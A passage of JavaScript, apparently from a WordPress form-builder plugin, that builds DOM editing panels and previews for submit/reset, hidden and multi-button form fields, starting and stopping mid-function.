                el_reset_title_textarea.setAttribute("id", "edit_for_title");
                el_reset_title_textarea.setAttribute("type", "text");
                el_reset_title_textarea.style.cssText = "width:160px";
                el_reset_title_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_resetform_id_temp', this.value)");
		el_reset_title_textarea.value = w_reset_title;
	
	
	var el_reset_active = document.createElement('input');
                el_reset_active.setAttribute("type", "checkbox");
                el_reset_active.style.cssText = "";
				el_reset_active.setAttribute("onClick", "active_reset(this.checked, "+i+")");
	if(w_act)
				el_reset_active.setAttribute("checked", "checked");

				
	var el_reset_active_label = document.createElement('label');
	                el_reset_active_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
					el_reset_active_label.innerHTML = "Display Reset button";
	
	
	
	
	var el_reset_func_label = document.createElement('label');
	                el_reset_func_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_reset_func_label.innerHTML = "Reset function";
	var el_reset_func_textarea = document.createElement('input');
                el_reset_func_textarea.setAttribute("type", "text");
                el_reset_func_textarea.setAttribute("disabled", "disabled");
                el_reset_func_textarea.style.cssText = "width:160px";
		el_reset_func_textarea.value = "check_required('reset')";

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_submit_reset')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_submit_reset')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_submit_reset')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_submit_reset')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	edit_main_td1.appendChild(el_submit_title_label);
	edit_main_td1.appendChild(br7);
	edit_main_td1.appendChild(el_submit_func_label);
	edit_main_td1_1.appendChild(el_submit_title_textarea);
	edit_main_td1_1.appendChild(br1);
	edit_main_td1_1.appendChild(el_submit_func_textarea);
	
	
	edit_main_td2.appendChild(el_reset_active_label);
	edit_main_td2.appendChild(br5);
	edit_main_td2.appendChild(el_reset_title_label);
	edit_main_td2.appendChild(br8);
	edit_main_td2.appendChild(el_reset_func_label);
	edit_main_td2_1.appendChild(el_reset_active);
	edit_main_td2_1.appendChild(br9);
	edit_main_td2_1.appendChild(el_reset_title_textarea);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_reset_func_textarea);

	edit_main_td3.appendChild(el_style_label);
	edit_main_td3_1.appendChild(el_style_textarea);
	
	edit_main_td4.appendChild(el_attr_label);
	edit_main_td4.appendChild(el_attr_add);
	edit_main_td4.appendChild(br3);
	edit_main_td4.appendChild(el_attr_table);
	edit_main_td4.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
//	edit_main_table.appendChild(edit_main_tr5);
//	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='button';	type1='button';   	type2='button'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_submit_reset");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_submit = document.createElement(element);
		    adding_submit.setAttribute("type", type1);
		
			adding_submit.setAttribute("class", "button_submit");
			
			adding_submit.setAttribute("id", i+"_element_submitform_id_temp");
			adding_submit.setAttribute("value", w_submit_title);
			adding_submit.innerHTML=w_submit_title;
			adding_submit.setAttribute("onClick", "check_required('submit', 'form_id_temp');");

	var adding_reset = document.createElement(element);
		    adding_reset.setAttribute("type", type2);
		
			adding_reset.setAttribute("class", "button_reset");
			if(!w_act)
				adding_reset.style.display="none";
				
			adding_reset.setAttribute("id", i+"_element_resetform_id_temp");
			adding_reset.setAttribute("value", w_reset_title );
			adding_reset.setAttribute("onClick", "check_required('reset');");
			adding_reset.innerHTML=w_reset_title;

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
		td1.style.cssText = 'display:none';
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.style.cssText = 'display:none';
			label.innerHTML = "type_submit_reset_"+i;
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_submit);
      	td2.appendChild(adding_reset);
	
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
change_class(w_class, i);
refresh_attr(i, 'type_submit_reset');
}

function type_hidden(i, w_name, w_value, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_hidden";
    
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
	var el_field_id_label = document.createElement('label');
	                el_field_id_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_field_id_label.innerHTML = "Field Id";
	
	var el_field_id_input= document.createElement('input');
                el_field_id_input.setAttribute("type", "text");
                el_field_id_input.setAttribute("disabled", "disabled");
                el_field_id_input.setAttribute("value", i+"_elementform_id_temp");
                el_field_id_input.style.cssText = "margin-left: 41px; width:160px";

	var el_field_name_label = document.createElement('label');
	                el_field_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_field_name_label.innerHTML = "Field Name";
	
	var el_field_name_input= document.createElement('input');
                el_field_name_input.setAttribute("type", "text");
		
                el_field_name_input.setAttribute("value", w_name);
                el_field_name_input.style.cssText = "margin-left: 16px; width:160px";
				el_field_name_input.setAttribute("onKeyPress", "return check_isspacebar(event)");
                el_field_name_input.setAttribute("onChange", "change_field_name('"+i+"', this)");

	var el_field_value_label = document.createElement('label');
	                el_field_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_field_value_label.innerHTML = "Field Value";
	
	var el_field_value_input= document.createElement('input');
                el_field_value_input.setAttribute("type", "text");
                el_field_value_input.setAttribute("value", w_value);
                el_field_value_input.style.cssText = "margin-left: 16px; width:160px";
                el_field_value_input.setAttribute("onKeyUp", "change_field_value('"+i+"', this.value)");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	edit_main_td1.appendChild(el_field_id_label);
	edit_main_td1.appendChild(el_field_id_input);
	edit_main_td2.appendChild(el_field_name_label);
	edit_main_td2.appendChild(el_field_name_input);
	edit_main_td3.appendChild(el_field_value_label);
	edit_main_td3.appendChild(el_field_value_input);
	edit_main_td4.appendChild(el_attr_label);
	edit_main_td4.appendChild(el_attr_add);
	edit_main_td4.appendChild(br3);
	edit_main_td4.appendChild(el_attr_table);
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
//	edit_main_table.appendChild(edit_main_tr5);
//	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='hidden';  
	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_hidden");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding = document.createElement(element);
            adding.setAttribute("type", type);
            adding.setAttribute("value", w_value);
            adding.setAttribute("id", i+"_elementform_id_temp");
            adding.setAttribute("name", w_name);

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
           	table.setAttribute("cellpadding", '0');
           	table.setAttribute("cellspacing", '0');
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
		td1.style.cssText = 'display:none';
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.style.cssText = 'display:none';
			label.innerHTML = w_name;
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding);
      	td2.appendChild(adding_type);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
refresh_attr(i, 'type_text');
}

function type_button(i, w_title , w_func , w_class, w_attr_name, w_attr_value){
	document.getElementById("element_type").value="type_button";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.setAttribute("id", "buttons");
		edit_main_td4.setAttribute("colspan", "2");
	
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
				
	var el_choices_add_label = document.createElement('label');
				el_choices_add_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_choices_add_label.innerHTML = "Add a new button&nbsp;";
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_button("+i+")");
	
				
	var el_attr_label = document.createElement('label');
				el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
				el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_style_label);
	edit_main_td1_1.appendChild(el_style_textarea);
	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br3);
	edit_main_td2.appendChild(el_attr_table);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_td3.appendChild(el_choices_add_label);
	edit_main_td3_1.appendChild(el_choices_add);
	
	n=w_title.length;
	for(j=0; j<n; j++)
	{	
		var table_button = document.createElement('table');
			table_button.setAttribute("width", "100%");
			table_button.setAttribute("border", "0");
			table_button.setAttribute("id", "button_opt"+j);
			table_button.setAttribute("idi", j+1);
		var tr_button = document.createElement('tr');
		var tr_hr = document.createElement('tr');
		
		var td_button = document.createElement('td');
		var td_X = document.createElement('td');
		var td_hr = document.createElement('td');
		    td_hr.setAttribute("colspan", "3");
		tr_hr.appendChild(td_hr);
		tr_button.appendChild(td_button);
		tr_button.appendChild(td_X);
		table_button.appendChild(tr_hr);
		table_button.appendChild(tr_button);
		
		var br1 = document.createElement('br');
		
		var hr = document.createElement('hr');
		hr.setAttribute("id", "br"+j);


		var el_title_label = document.createElement('label');
	
			el_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
	
			el_title_label.innerHTML = "Button name";
		
		var el_title = document.createElement('input');
			el_title.setAttribute("id", "el_title"+j);
			el_title.setAttribute("type", "text");
			el_title.setAttribute("value", w_title[j]);
			el_title.style.cssText =   "width:100px;  margin-left:43px;  padding:0; border-width: 1px";
			el_title.setAttribute("onKeyUp", "change_label('"+i+"_elementform_id_temp"+j+"', this.value);");
	
		var el_func_label = document.createElement('label');
	
			el_func_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
	
			el_func_label.innerHTML = "OnClick function";
		
		var el_func = document.createElement('input');
			el_func.setAttribute("id", "el_func"+j);
			el_func.setAttribute("type", "text");
			el_func.setAttribute("value", w_func[j]);
			el_func.style.cssText =   "width:100px;  margin-left:20px;  padding:0; border-width: 1px";
			el_func.setAttribute("onKeyUp", "change_func('"+i+"_elementform_id_temp"+j+"', this.value);");
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_button"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
